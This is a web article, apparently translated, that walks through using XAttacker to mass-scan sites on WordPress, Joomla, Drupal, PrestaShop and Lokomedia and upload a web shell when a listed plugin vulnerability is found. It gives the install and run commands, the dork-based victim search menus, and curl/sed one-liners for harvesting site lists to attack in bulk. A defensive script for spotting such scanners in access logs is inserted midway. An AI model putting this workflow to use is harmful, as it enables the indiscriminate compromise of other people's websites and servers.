Ways to hack into popular CMS: WordPress, Joomla, Drupal, etc.

From an attacker's point of view, site engines are no different from other software and services. Their source code is usually public, and any researcher can analyze it for bugs, including security holes. Therefore, sites running on a CMS rarely fall victim to a targeted attack; more often, they are compromised in bulk.


Hacking sites is one of the most common types of attack. If you are interested in how sites are hacked and what you need to look at to protect your resource, this article is for you. By structure, sites are divided into three large classes:

  • self-written (made manually in HTML, produced by a static generator such as Jekyll, or built in a constructor program such as Adobe Dreamweaver);
  • made in online constructors (mainly business-card sites without any databases or submitted fields);
  • running on a ready-made CMS (Content Management System).

There are still home-made CMSs created for a particular site, but this has now become a rarity: only the largest resources can afford to support their own system, and the associated costs are not easy to justify.

Hacking

A small manual on using the XAttacker program. Since the program is designed to check a large number of sites, I will also show examples of compiling lists of sites. XAttacker can search for sites by dork (via Bing) or work with your own list of sites; it then automatically detects the CMS of each site and checks it for popular vulnerabilities. Supported content management systems: WordPress, Joomla, Drupal, PrestaShop and Lokomedia. If a vulnerability is found, a shell is uploaded to the site.

Since the checks are fully automated and the list of known vulnerabilities is limited, the most obvious uses of the program are:

  • checking a target site when time is short
  • checking a large number of sites for vulnerabilities

The program is aware of such vulnerabilities as:

[1] WordPress:
  • Adblock Blocker
  • WP All Import
  • Blaze
  • Catpro
  • Cherry Plugin
  • Download Manager
  • Formcraft
  • levoslideshow
  • Power Zoomer
  • Gravity Forms
  • Revslider Upload Shell
  • Revslider Dafece Ajax
  • Revslider Get Config
  • Showbiz
  • Simple Ads Manager
  • Slide Show Pro
  • WP Mobile Detector
  • Wysija
  • InBoundio Marketing
  • dzs-zoomsounds
  • Reflex Gallery
  • Creative Contact Form
  • Work The Flow File Upload
  • WP Job Manger
  • PHP Event Calendar
  • Synoptic
  • Wp Shop
  • Content Injection
  • Cubed Theme NEW
  • Rightnow Theme NEW
  • Konzept NEW
  • Omni Secure Files NEW
  • Pitchprint NEW
  • Satoshi NEW
  • Pinboard NEW
  • Barclaycart NEW

[2] Joomla:
  • Com Jce
  • Com Media
  • Com Jdownloads
  • Com Fabrik
  • Com Jdownloads Index
  • Com Foxcontact
  • Com Ads Manager
  • Com Blog
  • Com Users
  • Com Weblinks
  • mod_simplefileupload
  • Com Facileforms NEW
  • Com Jwallpapers NEW
  • Com Extplorer NEW
  • Com Rokdownloads NEW
  • Com Sexycontactform NEW
  • Com Jbcatalog NEW

[3] Drupal:
  • Add Admin
  • Drupalgeddon NEW

[4] PrestaShop:
  • columnadverts
  • soopamobile
  • soopabanners
  • Vtermslideshow
  • simpleslideshow
  • productpageadverts
  • homepageadvertise
  • homepageadvertise2
  • jro_homepageadvertise
  • attributewizardpro
  • 1attributewizardpro
  • AttributewizardproOLD
  • attributewizardpro_x
  • advancedslider
  • cartabandonmentpro
  • cartabandonmentproOld
  • videostab
  • wg24themeadministration
  • fieldvmegamenu
  • wdoptionpanel
  • pk_flexmenu
  • pk_vertflexmenu
  • nvn_export_orders
  • megamenu
  • tdpsthemeoptionpanel
  • psmodthemeoptionpanel
  • masseditproduct
  • blocktestimonial NEW

[5] Lokomedia:
  • SQL injection

Mass check and exploitation of vulnerabilities on WordPress, Joomla, Drupal, PrestaShop and Lokomedia sites

To install the program:

git clone //github.com/Moham3dRiahi/XAttacker
cd XAttacker/

Can be run without options:

perl XAttacker.pl

Then the program will print:

[+] You Have List Of Sites
[1] Yes
[2] No
[-] Choose :

The question here is whether we have a list of sites. If we answer Yes (enter the number 1), we will need to specify the path to the file. The format of this file: one site per line, with the protocol (http or https) specified.

If we answer No (the number 2), the following menu will appear:

[1] Bing Doker |> Here You Chose Da Country Dat U Want
[2] Bing Dorker |> Here I Will Grab Using Ur Dork World Wide Country Websites
[3] Mass Site Grab |> By Ip or Websites List
[4] Mass Site Grab |> Range Ip by Ip or Website list

[+] Choose Number :

The options are as follows:

1. Search by dork for sites of a certain country
2. Search by dork for sites of any country
3. Mass collection of sites by IP or list of sites
4. Mass collection of sites by IP range or list of sites

In the third and fourth cases, sites must be specified without the protocol, that is, without http or https.

I am more interested in the possibility of checking a large number of already-prepared sites.

To do this, run the program with the -l option, followed by the name of the file with the list of sites to be checked:

perl XAttacker.pl -l list.txt

In this list, sites must be listed with the protocol (http or https).

The program will check them all in turn, show the vulnerabilities found and upload the shell if exploitation succeeds.

All vulnerable sites will also be listed together with the vulnerability found in the file Result/vulntargets.txt.
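Seen from the server side, a run like the one described above has a recognisable shape: one client sends a burst of requests for plugin, component and module paths belonging to several different CMS families within a few seconds, and most of them come back 404 because a given site runs only one engine. The following script is an added defensive example, not part of the original article or of the XAttacker project: it reads combined-format access log lines and flags source IPs whose traffic fits that pattern. The log lines, the path signatures, and the thresholds (60-second window, five distinct paths, two CMS families, 60% misses) are all constructed assumptions for illustration and should be tuned to real traffic.

```python
"""Flag source IPs whose requests look like an automated multi-CMS scanner.

Heuristic: within a short window, one client requests many distinct
CMS-specific paths spanning more than one CMS family, and most of those
requests are answered with 404.  A real site runs a single engine, so a
client probing WordPress, Joomla, Drupal and PrestaShop paths at once is
fingerprinting blindly, as a mass-check tool does.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Path prefixes that identify which CMS a request is aimed at (assumed
# signatures; extend for the engines you actually run).
CMS_SIGNATURES = {
    "wordpress": re.compile(r"^/wp-(content|admin|includes)/"),
    "joomla": re.compile(r"^/(index\.php\?option=com_|administrator/|components/com_)"),
    "drupal": re.compile(r"^/(CHANGELOG\.txt|sites/default/|core/)"),
    "prestashop": re.compile(r"^/modules/"),
}

# Constructed sample log lines (not real traffic).  203.0.113.10 behaves
# like a scanner; 198.51.100.7 and 192.0.2.5 are ordinary visitors.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:01 +0000] "GET /wp-content/plugins/example-slider/readme.txt HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:01 +0000] "GET /wp-content/plugins/example-form/upload.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:02 +0000] "GET /index.php?option=com_example HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:02 +0000] "GET /administrator/components/com_example/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:03 +0000] "GET /CHANGELOG.txt HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:03 +0000] "GET /modules/example-banner/upload.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:55:10 +0000] "GET /blog/post-1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:40 +0000] "GET /wp-content/uploads/photo.jpg HTTP/1.1" 200 40210 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:58:02 +0000] "GET /blog/post-2 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:14:01:00 +0000] "GET /wp-admin/ HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
192.0.2.5 - - [10/Oct/2023:14:01:05 +0000] "GET /wp-admin/edit.php HTTP/1.1" 200 9100 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def classify(path):
    """Name the CMS family a path targets, or None if it is not CMS-specific."""
    for name, rx in CMS_SIGNATURES.items():
        if rx.match(path):
            return name
    return None


def find_scanners(lines, window=timedelta(seconds=60), min_paths=5,
                  min_families=2, min_miss_ratio=0.6):
    """Return {ip: summary} for clients whose traffic matches the heuristic."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            ip, ts, path, status = rec
            events[ip].append((ts, path, status))

    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        # Slide a window starting at each request; flag on the first hit.
        for i, (start, _, _) in enumerate(evs):
            win = [e for e in evs[i:] if e[0] - start <= window]
            paths = {p for _, p, _ in win}
            families = {classify(p) for p in paths} - {None}
            misses = sum(1 for _, _, s in win if s == 404)
            miss_ratio = misses / len(win)
            if (len(paths) >= min_paths and len(families) >= min_families
                    and miss_ratio >= min_miss_ratio):
                flagged[ip] = {
                    "requests": len(win),
                    "distinct_paths": len(paths),
                    "cms_families": sorted(families),
                    "miss_ratio": round(miss_ratio, 2),
                }
                break
    return flagged


if __name__ == "__main__":
    for ip, info in find_scanners(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

Feed it a real access log with `find_scanners(open("access.log"))` and review the flagged IPs before acting on them; the 404 ratio is what separates a scanner from an ordinary visitor who happens to load a plugin asset, so raise `min_paths` rather than lower the ratio if the site serves many legitimate plugin paths.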

How to make lists of websites

The easiest way to get lists is to parse pages that list many sites: directories, search results, various aggregators and so on.

For example, parsing sites from a popular directory:

curl -s //top.mail.ru/Rating/Computers-Programming/Today/Visitors/{1..60}.html | grep -E '><a class="t90.*</a>' | sed 's/<br \/><a class="t90 t_grey" href="//' | grep -E -o '>.*<' | sed 's/>//' | sed 's/<//' > prog.txt

Note the construction {1..60}: in Bash this is brace expansion, which produces the sequence from 1 to 60, so sites will be collected from the first sixty pages of the directory.

Another example:

echo "//`curl -s //top.mail.ru/Rating/Job/Today/Visitors/{1..60}.html | grep -E '><a class="t90.*</a>' | grep -E -v '[.]html' | sed 's/<br \/><a class="t90 t_grey" href="//' | grep -E -o '>.*<' | sed 's/>//' | sed 's/<//'`" > biz.txt

Even larger lists of sites can be obtained, for example, for a shared-hosting IP using this service. However, that service lists sites without the protocol, so the following command must be run on the resulting list:

sed -i -e 's/^/\/\//' list.txt

As a result, the prefix “//” will be added to each site in the list.

Conclusion

XAttacker is very easy to use, but no new vulnerabilities have been added to it for quite some time, so for it to produce a positive result you need to check a really large number of sites.

Alternatively, to significantly improve the results, you need to search with dorks specially selected for the vulnerabilities this program supports, but that requires additional intellectual effort.


Source: //kali.org.ru/
